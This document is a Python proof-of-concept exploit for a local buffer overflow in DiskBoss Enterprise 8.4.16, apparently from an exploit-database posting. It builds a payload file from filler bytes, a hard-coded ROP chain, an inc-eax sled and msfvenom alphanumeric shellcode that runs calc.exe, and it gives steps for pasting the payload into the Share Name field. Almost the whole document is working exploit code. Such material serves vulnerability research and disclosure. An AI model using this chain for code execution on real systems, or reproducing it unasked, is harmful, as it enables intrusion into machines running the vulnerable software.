DiskBoss Enterprise 8.4.16 Local Buffer Overflow
Posted on 05 October 2017
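#!/usr/bin/python
"""DiskBoss Enterprise v8.4.16 local buffer overflow -- payload generator.

Exploit Author: C4t0ps1s (Twitter: @C4t0ps1s, Email: C4t0ps1s@gmail.com)
Exploit Title:  DiskBoss Enterprise v8.4.16 Local Buffer Overflow (code execution)
Date:           03-10-2017
Vulnerable Software / Version: DiskBoss Enterprise v8.4.16
Vendor Homepage: http://www.diskboss.com
Software Link:   http://www.diskboss.com/downloads.html
Tested On:       Windows 10 x64
Code execution built on the PoC of Touhid M.Shaikh:
    https://www.exploit-db.com/exploits/42917/

To reproduce the code execution:
  1. Click Server
  2. Click Connect
  3. In the "Share Name" field, paste the content of shareName.txt and try to connect

Payload layout written to shareName.txt (all offsets relative to the file start):
    [0      .. 1312)  filler "a" bytes up to the saved return address
    [1312   .. 1404)  92-byte ROP chain (see build_rop_chain)
    [1404   .. 1424)  20 x ``inc eax`` (0x40) sled
    [1424   .. 1864)  440-byte msfvenom windows/exec calc.exe, x86/alpha_mixed,
                      BufferRegister=EAX

Reviewer notes:
  * The gadget addresses below are hard-coded for v8.4.16 as annotated by the
    author; they are build-specific and presumably rely on the hosting module
    loading at a fixed base -- re-verify them against the target binary before
    reusing this chain.
  * The 1312-byte offset is taken from the original PoC; confirm it with a
    cyclic pattern if the target build differs.
  * The chain adds 0x7f7f7f7f + 0x7f7f7f7f + 0x0101015a (== 0x58 mod 2**32)
    to a saved ESP; splitting the constant that way and using alphanumeric
    shellcode is consistent with the payload having to survive a text field
    that cannot carry NUL bytes -- treat that as the author's intent, not a
    verified constraint.
  * The shellcode bytes are a paste of msfvenom output; if in doubt,
    regenerate with the command quoted at SHELLCODE rather than trusting the
    paste.
  * Local, user-interaction-driven PoC that launches calc.exe; use only on
    systems you are authorised to test.
"""
import struct

OUTPUT_FILE = "shareName.txt"

# Distance from the start of the controlled field to the saved return address
# (per the original PoC; confirm on a differing build).
JUNK_LEN = 1312

# Length of the ``inc eax`` (0x40) sled placed in front of the shellcode.
NOP_SLED_LEN = 20

# Filler dword for stack slots the chain pops into unused registers or skips
# via ``retn N``.
PADD = b"PADD"

# ROP gadgets, annotated by the original author (v8.4.16 build only).
GADGET_PUSH_ESP_POP_ESI_RET4 = 0x65247445   # push esp | pop esi | retn 4
GADGET_MOV_EAX_ESI_POP_ESI_RET4 = 0x65273f24  # mov eax, esi | pop esi | retn 4
GADGET_POP_EBX_RET = 0x65222936             # pop ebx | retn
GADGET_ADD_EAX_EBX_RET0C = 0x65222d7d       # add eax, ebx | pop esi | pop ebx | retn 0xc
GADGET_JMP_EAX = 0x65217d28                 # jmp eax

# Addends whose 32-bit sum (0x58) moves EAX from the saved ESP to the sled.
ADDEND_HIGH = 0x7f7f7f7f
ADDEND_FINAL = 0x0101015a

# msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" \
#     -e x86/alpha_mixed BufferRegister=EAX -f raw
# (440 bytes; every byte is alphanumeric, as expected for alpha_mixed.)
SHELLCODE = (
    b"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
    b"\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
    b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
    b"\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
    b"\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
    b"\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
    b"\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
    b"\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
    b"\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
    b"\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
    b"\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
    b"\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
    b"\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
    b"\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
    b"\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
    b"\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
    b"\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
    b"\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
    b"\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
    b"\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
    b"\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
    b"\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
    b"\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
    b"\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
    b"\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
    b"\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
    b"\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
    b"\x43\x48\x50\x65\x55\x50\x41\x41"
)


def p32(value):
    """Pack *value* as a little-endian unsigned 32-bit dword (bytes)."""
    return struct.pack("<L", value)


def build_rop_chain():
    """Return the 92-byte ROP chain that computes EAX = &sled and jumps to it.

    Walk-through, assuming the gadgets behave as annotated above:
      1. push esp / pop esi        -> ESI = ESP (points at slot 1, the 2nd dword)
      2. mov eax, esi              -> EAX = that stack address
      3. pop ebx                   -> EBX = 0x7f7f7f7f
      4. add eax, ebx  (x3)        -> EAX += 0x7f7f7f7f + 0x7f7f7f7f + 0x0101015a
                                      == EAX + 0x58, i.e. the dword right after
                                      this 92-byte chain (the inc-eax sled)
      5. jmp eax
    Each ``retn 4`` / ``retn 0xc`` discards one / three PADD slots; the
    ``pop esi`` / ``pop ebx`` side effects consume the slots marked below.
    """
    chain = [
        p32(GADGET_PUSH_ESP_POP_ESI_RET4),
        p32(GADGET_MOV_EAX_ESI_POP_ESI_RET4),
        PADD,                       # skipped by retn 4 of gadget 1
        PADD,                       # -> esi (gadget 2)
        p32(GADGET_POP_EBX_RET),
        PADD,                       # skipped by retn 4 of gadget 2
        p32(ADDEND_HIGH),           # -> ebx
        p32(GADGET_ADD_EAX_EBX_RET0C),  # eax += 0x7f7f7f7f
        PADD,                       # -> esi
        p32(ADDEND_HIGH),           # -> ebx
        p32(GADGET_ADD_EAX_EBX_RET0C),  # eax += 0x7f7f7f7f
        PADD, PADD, PADD,           # skipped by retn 0xc
        PADD,                       # -> esi
        p32(ADDEND_FINAL),          # -> ebx
        p32(GADGET_ADD_EAX_EBX_RET0C),  # eax += 0x0101015a  (total +0x58)
        PADD, PADD, PADD,           # skipped by retn 0xc
        PADD,                       # -> esi
        PADD,                       # -> ebx
        p32(GADGET_JMP_EAX),
    ]
    return b"".join(chain)


def build_payload(junk_len=JUNK_LEN, shellcode=SHELLCODE):
    """Return the full payload: filler, ROP chain, inc-eax sled, shellcode.

    Args:
        junk_len:  bytes of filler before the saved return address.
        shellcode: raw shellcode; the alpha_mixed decoder expects EAX to point
                   at its first byte, which the ``inc eax`` sled preserves
                   (each 0x40 advances EAX in lock-step with EIP).
    """
    parts = [
        b"a" * junk_len,
        build_rop_chain(),
        b"\x40" * NOP_SLED_LEN,   # inc eax
        shellcode,
    ]
    return b"".join(parts)


def main(path=OUTPUT_FILE):
    """Write the payload to *path* in binary mode (no newline translation)."""
    with open(path, "wb") as fh:
        fh.write(build_payload())


if __name__ == "__main__":
    main()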